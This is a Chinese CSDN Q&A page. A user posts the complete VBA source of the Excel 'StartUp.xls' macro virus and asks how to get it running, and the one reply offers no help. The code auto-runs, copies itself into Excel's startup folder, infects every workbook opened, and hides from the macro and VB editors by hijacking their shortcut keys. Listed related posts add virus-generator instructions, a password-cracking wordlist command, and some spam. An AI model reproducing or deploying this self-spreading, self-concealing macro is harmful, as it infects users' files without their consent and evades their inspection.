我有一段VB的宏病毒startup病毒代码 我想请问怎么让他运行起来

Sub auto_open()
On Error Resume Next
'如果打开的不是StartUp.xls
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False '不刷新屏幕
ThisWorkbook.Sheets("StartUp").Copy '复制StartUp的工作表到当前的工作簿中
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") '保存
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False '隐藏
Workbooks("StartUp.xls").Save
Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!cop" '工作表激活时调用StartUp模块的cop过程
Application.OnKey "%{F11}", "StartUp.xls!escape" '处理alt+F11和alt+F8快捷键,F11打开VB编辑器,F8打开宏窗口时,调用StartUp模块的escape过程
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub cop()
On Error Resume Next
'如果当前激活的工作表不是StartUp,则复制StartUp,并把选择原先用户的要激活的工作表
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub
Sub back()
On Error Resume Next
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"
Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub

Sub escape()
'这个过程主要是在用户打开宏窗口或是VB编辑器时看不到StartUp
On Error Resume Next
Application.OnSheetActivate = "StartUp.xls!back" '当有工作表被激活时,startup又要回来了。
Application.OnKey "%{F11}"
Application.OnKey "%{F8}"
Application.SendKeys "%{F11}"
Application.SendKeys "%{F8}"
For Each book In Workbooks
Application.DisplayAlerts = False '在删除时,不要显示提示对话框
If book.Name = "StartUp.xls" Then book.Sheets("StartUp").Delete '删除StartUp
Next
For Each book In Workbooks
If book.Name = "StartUp.xls" Then
book.Close '关闭StartUp工作簿
End If
Next
End Sub

0

1个回答

完全看不懂,路过进来看看

0
Csdn user default icon
上传中...
上传图片
插入图片
抄袭、复制答案,以达到刷声望分或其他目的的行为,在CSDN问答是严格禁止的,一经发现立刻封号。是时候展现真正的技术了!
其他相关推荐
如何调试Word宏病毒,以及使用VS调试VB脚本
一般Word被嵌入了带有恶意行为的宏代码(VBA代码),当我们双击打开带有宏病毒的word文档的时候它的宏代码会自动运行。或者有的word默认是禁止宏运行,会弹出一个提示,是否允许运行携带的宏代码。 上面是一个11月份的比较新的,针对银行的木马,主要通过垃圾邮件附件的方式传播,以Word宏作为病毒载体。 我使用的是Office2013默认禁止运行宏。但是邮件的内容是诱导用户去点击那个&amp;amp;quot;启动内容&amp;amp;quot;...
遭遇StartUp.xls宏病毒
今天一个朋友让我帮忙看一个问题,说是Excel文件一打开再保存就提示“此文档中包含宏、ActiveX 控件、XML 扩展包信息或Web组件。他们中可能含个人作息,这些作息无法能过设置“工具”菜单下“选项”对话框“安全性”选项卡中的“保存时从文件属性中删除个人作息”来删除”。当时只是以为设置的问题,后来查了好几小时才发现原来是中了个宏病毒,名字是:StartUp.xls,中间定位病毒的过程也比较曲折...
宏病毒分析
1.实训目的掌握宏病毒的制作方法2.实训环境PC、Windows 8、Windows 7、Windows xp等操作系统,office办公软件3.实训内容制作宏病毒,并运行分析。具体实训步骤如下:(1)启动word,创建一个新文档(2)在新文档中打开工具菜单、选择宏、查看宏(3)为宏起一个名字,自动宏的名字规定必须为autoexec(4)单击创建按钮(5)在宏代码编辑窗口,输入VB代码Shell(...
k4.xls 病毒清除程序 宏病毒专杀
k4.xls 病毒清除程序 宏病毒专杀,本人清测。
Word宏病毒
宏病毒就是Word中被嵌入的带有恶意行为的宏代码(VBA代码),当我们双击打开带有宏病毒的word文档的时候它的宏代码会自动运行 1、自动运行的宏 通过为一个宏赋予某个特殊的名称,就可在执行某项操作(例如启动 Word 或打开文档)时自动运行宏。 Word 将下列名称识别为自动宏,或称“auto”宏。 AutoExec:启动 Word 或加载全局模板时 AutoNew...
QT 程序启动动画
简述 我们日常用的很多软件都有启动动画,比如Visual Studio和PyCharm在打开软件之前都会有一个加载各种组件的过程。它们的启动动画就是告诉你程序正在打开的过程中,正在加载组件,而不是让你以为程序没有启动。 那么,QT中可不可以实现这样的效果呢,当然是可以的。QT提供了QSplashScreen这个类来实现启动动画的效果。 效果 代码之路 最基本的...
360查杀不出来的病毒源代码SOLA
刚发现的病毒用360查杀了6次都没有查杀出来,用vbs做出来就可以了
vbs病毒分析神技——使用VS2017调试vbs脚本
在分析VBS类的文档病毒的时候,通常会因为病毒加密问题感到头疼,如果加密了好几层,只能用MsgBox或者输出到文件,一层一层解密,但是如果能有个顺手的调试器去调试就能达到事半功倍的效果了 设置VS2017调试器 接着选择调试-&gt;选项,把脚本前面的勾给打上,这一步需要管理员权限 调出调试器 命令行输入wscript /X 要调试vbs脚本的路径 或者用cmd敲上这条命令也可以打开调试器 ...
[首发] office宏病毒专杀工具 k4 宏病毒专杀 查杀360等杀软不能查杀的新型宏病毒
原创首发:宏病毒专杀工具,查找k4宏病毒特征码,查杀指定目录下的office宏病毒,专杀excel宏病毒, 推荐与金山宏病毒专杀工具组合使用,本工具能够查杀金山宏专杀无法查杀的 k4宏病毒
宏病毒的研究与实例分析04——实战分析
文章目录样本1-powershell_downloader样本2-严重混淆样本3-行为监控最后说明 本章我们将分析几个有趣的宏病毒,一窥宏病毒分析技巧。本章所有样本均存在恶意行为,请在虚拟机中运行。 样本1-powershell_downloader 首先使用oledump.py提取宏: 提取到的宏代码如下: Attribute VB_Name = &amp;quot;Module1&amp;quot; Sub Auto_Open...
为什么领导总想让你加班
更多内容关注公众号:SAP Technical 点击链接进入: 1、 https://mp.weixin.qq.com/s?__biz=MzI1MDUxMjc0MQ==&amp;mid=2247485639&amp;idx=1&amp;sn=87c8036931e2d01841f046ae09ade15b&amp;chksm=e9805ccddef7d5dbe68ccef323498a...
Excel4.0宏病毒查看隐藏宏代码
样本可用下载地址:https://github.com/InQuest/malware-samples/blob/master/2019-01-15-Mal-Excel-Doc-Macrosheet/98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 0)常规宏病毒 跟以往的宏病毒不太一样,平时遇到宏病毒,可以按住shi...
有没有一个Map实现类,他的特点是线程安全,但是效率要比Vector高?
有没有一个Map实现类,他的特点是线程安全,但是效率要比Vector高 Map 是最常用的数据结构之一. Map 的字面翻译是映射(地图就是一种映射). 在JavaSE中,对Map的实现主要包括: HashMap, TreeMap, HashTable 和 LinkedHashMap. 如果每个类都用一句话来描述,则表述如下: HashMap 使用哈希表(hash table)实现, 在 keys...
台湾NO.1 WORD宏病毒源码
台湾NO.1 WORD宏病毒源码 相当有来头 弄了半天没懂的东西
那些让程序员们哭笑不得的病毒
提起病毒来,很多网友可能都会想到熊猫烧香,木马等等。它们的破坏力惊人,很多人因此也会谈“毒”色变。而程序员作为一群靠电脑吃饭的人,看过的病毒恐怕不比看过的片少,今天小编带大家盘点一下那些令程序员哭笑不得的病毒,相信你们也会喜欢这些另类的病毒的。 1、可爱的病毒 程序员甲:我以前中过一个病毒,在我电脑桌面左侧会多了一个可爱的卡通妹子,在哪里吃饭睡觉玩耍,她肚子饿了就去吃掉最靠近她的图标,
女生7个表现,表示她想做你女朋友
几年来家里都给我安排相亲,我每次都对女孩特别好,但对方始终没有更进一步,我一直很迷茫,搞不清楚女生到底在想什么? 告诉你,怎么识别女生是否缺爱容易得手! 恋爱的正确的方法和高情商男人是如何做的,短短几天,7个女生表现,她想做你女朋友。 1、十分注重形象,不断给你新鲜感俗话说的好,女为悦己者容。从古到今,女人认为吸引男人的法则就是在外在形...
StartUp宏病毒专杀(永久使用)
本工具用于专杀Excel的StartUp宏病毒。运行前提:1、把安全性设为低;2把“可靠运行商”的“信任对于Visual Basic项目的访问”勾上。 对前一版本(链接:http://download.csdn.net/detail/a10615/3966065)进行了更新。把使用的期限取消了,可以永久性地使用。还作了些其他修改。
Excel-Results宏病毒删除
删除excel宏病毒工具,他能方便快捷的删除表格宏病毒,是您的电脑更加安全
做为一个程序员,你都见过什么有趣的电脑病毒?
温馨提示:本文素材来自于知乎,版权归原作者所有!提起电脑病毒,小伙伴你最先想到的是什么?熊猫烧香,木马,还是前段时间很火的勒索病毒...做为一个程序员,你都遇到过那些有趣的电脑病毒,说出来让娜姐见识一下呗!壹我以前中过一个病毒,在我电脑桌面左侧会多了一个可爱的卡通妹子,在哪里吃饭睡觉玩耍,她肚子饿了就去吃掉最靠近她的图标,所以我每天都要准备一堆复制出来的快...
k4宏病毒专杀工具.rar
我找到的一个k4宏病毒专杀工具,请大家验证
关机整人小病毒代码
关机整人小病毒代码
清理WORD宏病毒感染的模板文件.rar
清理 WORD 宏病毒 感染的 模板文件
宏病毒无害样本(powered by c4maker)
宏病毒无害样本,无恶意进程,只能给大家研究下
office_excel宏病毒专杀
宏病毒专杀(CleanMacro)是毒霸资深反病毒工程师boom的业余作品,有需要的朋友可以下载使用~本专杀用于解决Book1、Startup、Results、Poppy、CopyMod、Blackice、Yugall等Office常见宏病毒。宏病毒杀不了怎么办,用宏病毒专杀, 特别说明: 1、7.10版本开始和以前版本不兼容,使用新版本时,请先删除老版本。 2、7.11版本解决上一个版本被杀软误报 的问题,请更新下新版本。 3、10.11版本开始支持了autocad病毒查杀,在查毒前请关闭autocad主程序。
simditor富文本编辑器的使用
下载地址:https://github.com/mycolorway/simditor/releases 1.引入CSS &amp;lt;link rel=&quot;stylesheet&quot; href=&quot;/static/plugins/editor/styles/simditor.css&quot;&amp;gt; 2.引入js &amp;lt;script src=&quot;/static/plugin...
谁盗用了我的账号,简直可怕!!!!!!
写篇文章,纪念我被盗过的csdn账号今天2018-06-14登录csdn博客发现博客被封!!询问管理员,管理员说,博客发了大量非法链接。回去查看回收站,看到如下类似文章,都是这种随便截的标题,内容是一大堆链接!!!链接全是某交友网站。。。。几秒钟转一篇,肯定不是手速的问题了吧????看下登录日志。。。。被人拿代理到处登录了吧……查到网上也有人有同样遭遇。太久没登录都不记得积分有没有少,文章有没有被...
操他妈的逼
老子这次,没什么好说的了。
宏病毒的工作原理与防治技术
宏病毒的产生,是利用了一些数据处理系统内置宏命令编程语言的特性而形成的。这些数据处理系统内置宏编程语言的存在使得宏病毒有机可乘,病毒可以把特定的宏命令代码附加在指定文件上,通过文件的打开或关闭来获取控制权,实现宏命令在不同文件之间的共享和传递,从而在未经使用者许可的情况下获取控制权,达到传染目的。 目前在可被宏病毒感染的文件中,以Word,Excel居多。Word宏病毒与Excel宏病毒的特性较为相似,因此仅以word宏病毒为例,说明宏病毒的作用,传染以及发作的机理和特性。
整人代码(我是猪)
#include &amp;amp;quot;stdio.h&amp;amp;quot; #include &amp;amp;quot;string.h&amp;amp;quot; #include &amp;amp;quot;stdlib.h&amp;amp;quot; #define _CRT_SECURE_NO_WARNINGS int user_scanf() { int i = 0; char ch[100] = { 0 }; printf(&amp;amp;quot
跟男朋友分手了,想挽回应该怎么做
在爱情中,大部分人都会迷失在别人的世界里。只能看见别人身上的问题,往往是看不到自己。从而失去理智,看不清楚方向。失恋仿佛是爱情的必经过程,当然也有一部分是从初恋开始就美好的结局。但是绝大多数的爱情还是波澜迭起的,分手也是比较常见的过程。男性和女性在爱情中还是比较平等的,失恋的概率也差不多。但是女性提出分手的概率和分手后想要复合的想法,相对男生会更加的强烈。但是如果你是一个已经分手的女生,却连这几点
APT32宏病毒分析
本来是想把这个APT样本全部都分析完了着,但是实在没有找到drop的样本 ,就只能分析分析这个宏样本了 静态信息 样本名称 2017年员工工资性津贴额统计报告.doc MD5 5458a2e4d784abb1a1127263bd5006b5 从样本名称看非常具有诱惑性,就是这种诱惑性是一切罪恶的源头 我们打开样本,可以看到社会工程学的运用,提示用
手动删除EXCEL宏病毒方法
手动删除EXCEL宏病毒方法
中毒了!HTML文件被写入 DropFileName = "svchost.exe" 开头的代码
首先是 360提示 DLL文件是病毒文件,其实是被感染了。 然后所有的HTML文件的末尾都被写入了 以 DropFileName = "svchost.exe"  开头的代码很长很长。 那么杀毒吧,360 一个盘一个盘杀,耗时半天,最后一看 文件又被感染了,重新来过! 注意杀毒的时候 不要操作任何程序,不然都有可能再次感染,根据 网上的说法,用nod32或是小红伞,ramnit专杀
送给女朋友的代码
没时间送礼物,也可以让女朋友开心。技术不行,只能给兄弟们做到这了。
拿到一份代码如何跑起来
1、设置启动项 2、数据库(修改连接字符串,连到本地数据库)   a.【拷贝数据库架构和数据】 如果SQL Server 版本开发环境和生产的不同 ,就用生成文本的方式,如下:  数据库是生产的,就拷贝一份到本,整个数据库 右键生成脚本,复制的时候要选架构和数据。 然后在本地数据库创建一个空的数据,命名与生产环境的一样。在开发环境 执行脚本就可以。 b.【用Visual Studio ...
我想收你当徒弟,你愿意吗?
1.师傅 我答应你 1 2.上班 今天买了个 转接口 40 听说公司给报销 可以可以。 1 3.健身 第二天 1
Windows系统下的 vbs病毒生成器使用方法!
1,压缩包里的东西~ 下载并解压“病毒生成器”压缩文件,打开对应的文件夹,双击&amp;quot;vir1.exe&amp;quot; 应用程序图标。 下载时杀毒软件会自动将其识别为病毒,建议关闭主机上运行的杀毒软件 双击软件启动~:如果有杀毒软件,会进行检测。这个时候要添加信任才可以继续使用! 认真阅读&amp;quot;了解本程序”文本框中的内容。单击 “下一步”按钮。 勾选病毒要复制到的文件夹复选框并填写病毒副本文件名。单击“下一步”按钮...
bugku 杂项 想蹭网先解开密码(tips:密码为手机号,为了不为难你,大佬特地让我悄悄地把前七位告诉你 1391040** Goodluck!!)
下载后打开 打不开发现 需要破解手机后四位 所以在 Linux 中 使用 crunch命令 创造 密码字典 ( ’%’------插入数字 ) 那么构造 crunch 11 11 -t 1391040%%%% &gt;&gt;wifimima.txt 格式 : crunch&lt;min-len&gt;&lt;max-len&gt;[&lt;chars...
整人_说我是猪
整人_说我是猪,不说就关机! 整人_说我是猪,不说就关机! 整人_说我是猪,不说就关机! 整人_说我是猪,不说就关机! 整人_说我是猪,不说就关机! 整人_说我是猪,不说就关机! 整人_说我是猪,不说就关机! 整人_说我是猪,不说就关机! 整人_说我是猪,不说就关机!
tomcat双击startup启动闪退问题解决(首先让窗口不会关闭,看到错误信息才是解决问题的前提)
背景:         环境变量配置好后,在命令行下执行Java、javac命令均正常;但是双击startup启动tomcat时出现闪退现象,重新配置环境变量无效。 一、先看到问题才行(找准病因才好下手治病):     闪退根本看不清命令行里面打印了什么,于是在startup.bat里面,最后一行加上pause,使得窗口不会关闭,打印信息如下:     Neither the JAVA_H...